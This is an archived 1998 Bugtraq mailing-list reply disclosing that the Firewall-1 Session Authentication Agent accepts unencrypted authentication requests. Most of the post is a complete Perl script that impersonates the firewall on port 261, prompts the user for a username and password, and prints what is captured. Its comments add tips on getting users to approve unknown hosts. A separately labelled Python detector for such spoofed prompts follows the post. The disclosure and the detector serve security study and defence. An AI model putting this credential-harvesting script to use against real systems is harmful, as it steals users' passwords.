[8031] in bugtraq
Re: Firewall-1 3.0b Session Agent
daemon@ATHENA.MIT.EDU (Andrew Danforth)
Fri Sep 25 21:12:10 1998
Date: Fri, 25 Sep 1998 18:24:58 -0400
Reply-To: Andrew Danforth <acd@WEIRDNESS.NET>
From: Andrew Danforth <acd@WEIRDNESS.NET>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.96.980925123809.24629A-100000@mail.commwerks.com>

On Fri, 25 Sep 1998, Brooke Paul wrote:
> > -----Original Message-----
> > From: Larry Pingree [SMTP:larryp@secure-it.net]
> >
> > A problem exists in the Firewall-1 3.0b Session Agent
> >
> > All communications from the Firewall-1 Module to the session agent are
> > non-encrypted. Thus also allowing these communications to be snooped for
> > usernames and passwords.
>
> I think it's worth noting that Checkpoint states that the included
> Session Agent is a 'demo' and not officially supported. The real problem
> is the protocol they have defined. Even if you attempt to write a secure
> version it wouldn't interoperate with the firewall.

Where is that stated? I was unable to find any documentation stating that
the Authentication Agent is a demo. I'd be surprised if they advertised
Session Auth as a feature yet claimed that their Agent wasn't supported...

Here's the script that Larry referred to. I whipped it up during his FW-1
class, of all places... :)

---------- SNIP ----------
#!/usr/bin/perl -w
#
# This script connects to a FireWall-1 Session Authentication Agent
# running on Windows 95/NT. It attempts to "authenticate" the remote
# user and returns the resulting username/password.
#
# The agent supports configuration of up to three IP addresses which
# are allowed to submit authentication requests. If there are three
# addresses configured, the user is presented with the following when
# an unknown host connects:
#
# "Authentication request from this IP Address is not allowed."
# [ OK ]
#
# If there are only one or two addresses allowed, the user gets this
# nice little dialog box:
#
# "Do you want to enter this IP to the Firewall-1 list"
# [ YES ] (default) [ NO ]
#
# Guess which button your typical user will click on?
#
# If the agent closes the connection prematurely, you will get strange
# results.
#
# tested vs. FW-1 Authentication Agent 1.1
#
# Andrew Danforth <acd@weirdness.net>
require 5.000;
use Socket;
use Getopt::Std;
$| = 1;
$FIREWALL_NAME = "Corporate Firewall";
$PASSWORD_PROMPT = "FireWall-1 password";
$PORT = 261;
die unless getopts('n:p:');
unless ($TARGET_IP = shift) {
    print "usage: $0 [-n firewall_name] [-p password_prompt] target_ip\n";
    exit(1);
}
$FIREWALL_NAME = $opt_n if (defined $opt_n);
$PASSWORD_PROMPT = $opt_p if (defined $opt_p);
socket(SOCK, AF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "socket: $!";
connect(SOCK, sockaddr_in($PORT, inet_aton($TARGET_IP))) || die "connect: $!";
select(SOCK); $| = 1; select(STDOUT);
print SOCK "220 FW-1 Session Authentication Request from $FIREWALL_NAME\n\r";
print "sent greeting\n";
print SOCK "331 User:\n\r";
print "sent user request\n";
$username = &get_response;
print "username entered: $username\n";
print SOCK "331 *$PASSWORD_PROMPT:\n\r";
$password = &get_response;
print "password entered: $password\n";
print SOCK "200 User $username authenticated by FireWall-1 authentication.\n\r";
print SOCK "230 OK\n\r";
sub get_response {
    # this is ugly but it works. the session agent doesn't seem to send proper newlines.
    my $input;
    $input .= $key while($key = getc SOCK and ord($key));
    return $input;
}
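
Added example, not part of the original post or its script: a defender-side check in Python for the behaviour described above. It flags hosts other than the known firewall modules that send session-authentication prompts to an agent on port 261, and lists agents whose allowed-address list has fewer than three entries (per the script's comments, those ask the user whether to add an unknown host). The session records, allow-lists, addresses and function names are constructed for illustration.

```python
import ipaddress
import re

AGENT_PORT = 261  # port the script in this post connects to

# Reply codes sent to the agent in the post: 220 greeting, 331 prompts.
PROMPT_RE = re.compile(r"^(220 FW-1 Session Authentication Request|331 )")

# Constructed sample data (not from the original post).
# Each record: (initiator_ip, agent_ip, dest_port, lines sent by initiator)
SAMPLE_SESSIONS = [
    ("192.0.2.1", "10.1.1.20", 261,
     ["220 FW-1 Session Authentication Request from Corporate Firewall",
      "331 User:", "331 *FireWall-1 password:"]),
    ("10.1.1.77", "10.1.1.20", 261,
     ["220 FW-1 Session Authentication Request from Corporate Firewall",
      "331 User:", "331 *FireWall-1 password:"]),
    ("10.1.1.77", "10.1.1.21", 80, ["GET / HTTP/1.0"]),
]
# Constructed: allowed-address list configured on each agent (max three).
SAMPLE_AGENT_ALLOWLISTS = {
    "10.1.1.20": ["192.0.2.1"],
    "10.1.1.21": ["192.0.2.1", "192.0.2.2", "192.0.2.3"],
}

def unauthorized_prompts(sessions, firewall_modules):
    """Return (initiator, agent) pairs where a host that is not a known
    firewall module sent session-auth prompts to an agent on port 261."""
    trusted = {ipaddress.ip_address(ip) for ip in firewall_modules}
    hits = []
    for src, dst, dport, lines in sessions:
        if dport != AGENT_PORT:
            continue
        if ipaddress.ip_address(src) in trusted:
            continue
        if any(PROMPT_RE.match(line) for line in lines):
            hits.append((src, dst))
    return hits

def agents_that_prompt_user(allowlists):
    """Agents with fewer than three allowed addresses ask the user whether
    to add an unknown host instead of refusing it (behaviour per the post)."""
    return sorted(ip for ip, allowed in allowlists.items() if len(allowed) < 3)

if __name__ == "__main__":
    print(unauthorized_prompts(SAMPLE_SESSIONS, ["192.0.2.1"]))
    print(agents_that_prompt_user(SAMPLE_AGENT_ALLOWLISTS))
```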